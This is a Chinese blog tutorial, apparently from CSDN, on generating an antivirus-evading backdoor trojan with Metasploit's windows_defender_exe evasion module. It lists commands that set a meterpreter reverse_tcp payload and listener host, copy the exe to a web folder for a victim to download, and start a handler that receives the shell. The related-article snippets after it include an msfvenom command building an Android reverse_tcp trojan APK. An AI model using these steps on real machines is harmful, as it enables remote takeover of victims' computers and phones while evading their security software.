渗透测试-使用metasploit的evasion模块生成后门木马

已于 2022-02-04 23:24:50 修改
阅读量1.8k 收藏 13
点赞数 8
分类专栏: 渗透测试 网络安全 kali linux 文章标签: 安全 运维 渗透测试 kali linux
于 2022-01-17 17:08:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122543103
版权

1.evasion简介

evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。

2.操作流程

打开kali系统的Metasploit软件。

如图,我们可以看到evasion中有7个模块

 查看模块 search evasion

使用模块 use evasion/windows/windows_defender_exe

 查看需要配置的参数 show options

生成软件 set FILENAME 666.exe

 指定一个payload  set payload windows/meterpreter/reverse_tcp

 设置监听主机 set LHOST 192.168.0.109

 run

 将生成的软件复制到/var/www/html/目录下,便于去下载

cp /root/.msf4/local/666.exe /var/www/html/

在MSF上启动handler开始监听后门程序

1.kali启动Metasploit软件

2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options

3.建立payload  set payload windows/meterpreter/reverse_tcp

4.设置监听主机--kali  set LHOSTS 192.168.1.109

5.开启run 

win7系统下载生成的666.exe文件

 运行软件,我们就成功建立会话成功

保持微笑-泽
关注
专栏目录
Kali渗透测试Metasploit 6.0 中的Evasion模块
Liu_Bruce的博客
05-11 802
Kali渗透测试Metasploit 6.0 中的Evasion模块 Metasploit 开发团队一直致力于免杀技术的研究,并且将一些研究成果应用在了这款产品中。其中Evasion模块可以生成免杀的远程控制被控端。在启动Metasploit时,可以看到Evasion模块,启动命令如下: ┌──(root💀kali)-[~] └─# msfconsole 8个evasion模块,如下图所示: 使用show evasion命令可以列出Metasploit 6.0中的所有Evasion模块 msf6 &g
Kali环境使用Metasploit生成木马入侵安卓手机
热门推荐
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
使用metasploitEvasion模块
weixin_34410662的博客
03-13 343
简介 几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试 操作 首先打开metasploit msfconsole 你会看到下面这个界面 ➜ ~ msfconsole This copy of metasploit-framework is more than two...
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-15 851
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Evasion 使用及实际免杀测试
时乙的博客
10-06 837
kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成木马的实际免杀效果。 360版本:13.0.0.2002 备用木马库:2021-10-05 360杀毒:5.0.0.8140 火绒版本:5.0.63.2 病毒库:2021-09-29 Evasion使用 msfconsole进入msf show evasion 查看Evasion所提供的模块 一、evasion/windows/windows_defender_exe...
Metasploit生成Android木马远控自己的安卓设备
qq_59235193的博客
01-15 5398
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网
Metasploit在线payload生成使用技巧
Metasploit与Payload的搭配使用可以帮助安全研究人员、渗透测试人员和黑客快速发现和利用系统漏洞。 ## 1.1 什么是Metasploit Metasploit是一个功能强大的渗透测试工具,由Metasploit框架支持。它提供了一系列已...
TideSec远控免杀学习二(Evasion模块+veil)
fa1lr4in的小博客
02-10 1263
Evasion模块 参考链接: applocker_evasion_install_util.md: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md 基于白名单Csc.exe执行...
Metasploit
m0_57379855的博客
03-30 3318
Metasploitmetasploit下载ubuntu安装msfubuntu下载Kali开启msfKali下载Kali添加root用户打开msfKali更新msfViper炫彩蛇Kali安装viperMetasploit目录结构Metasploit模块auxiliaryexploitspayloadspostencodersevasionnopsmsfvenom常用参数-l-p-f-e-a-o-b-n-s-i-c-x-k-v各平台生成payload命令WindowsMacAndroidPowershell
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1055
万字渗透测试入门知识点,自学查漏补缺
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 292
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
kali metasploit生成木马入侵android
weixin_30483013的博客
05-25 1582
1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 > /root/apk.apk #生成apk木马,设置本机ip与自定义端口 然后启动msf: msfconsole 1.us...
远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)
Ms08067安全实验室
02-19 638
本专题文章导航1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题文章(2)-msfve...
MSF-Evasion模块免杀
LainWith的博客
12-15 1126
最近开始学习免杀,发现Tide团队有免杀的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址 远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71) 实验环境前言defender(VT查杀率42/69)hta(VT查杀率26/61)其他 实验环境 为避免木马被杀导致别的平台没有机会检测,实验时会每次只启动一个杀软,然后截图,最后把关于这个木马的截图汇成一张图 选择的是当下最新版本的火绒、360、360杀毒、腾讯电脑管家,版本如下: 火
【MSFconsole进阶】evasion(免杀模块):免杀模块使用方法,相关设置
05-24 1649
【渗透工具】MSFconsole进阶:evasion(免杀模块
Metasploit -- 生成木马(msfvenom)
weixin_41489908的博客
03-03 1204
男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。 ---- 网易云热评 作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个N.
MSF evasion模块使用
永远是少年
06-10 560
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF evasion模块使用。 一、木马文件生成 二、SHELL反弹检验
metasploit、msfvenom生成木马入侵电脑及手机
weixin_34205076的博客
06-11 1166
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --he...
Metasploit后门攻击android
2301_77778745的博客
04-26 429
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
Metasploit渗透测试教程:利用MS12-004漏洞
Metasploit是一款广泛应用于安全评估和渗透测试的开源框架,它包含了大量的漏洞利用模块、扫描器、后渗透工具等,可以帮助安全专家模拟攻击行为,发现系统中的安全漏洞。在本教程中,作者使用Metasploit来演示MS12...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值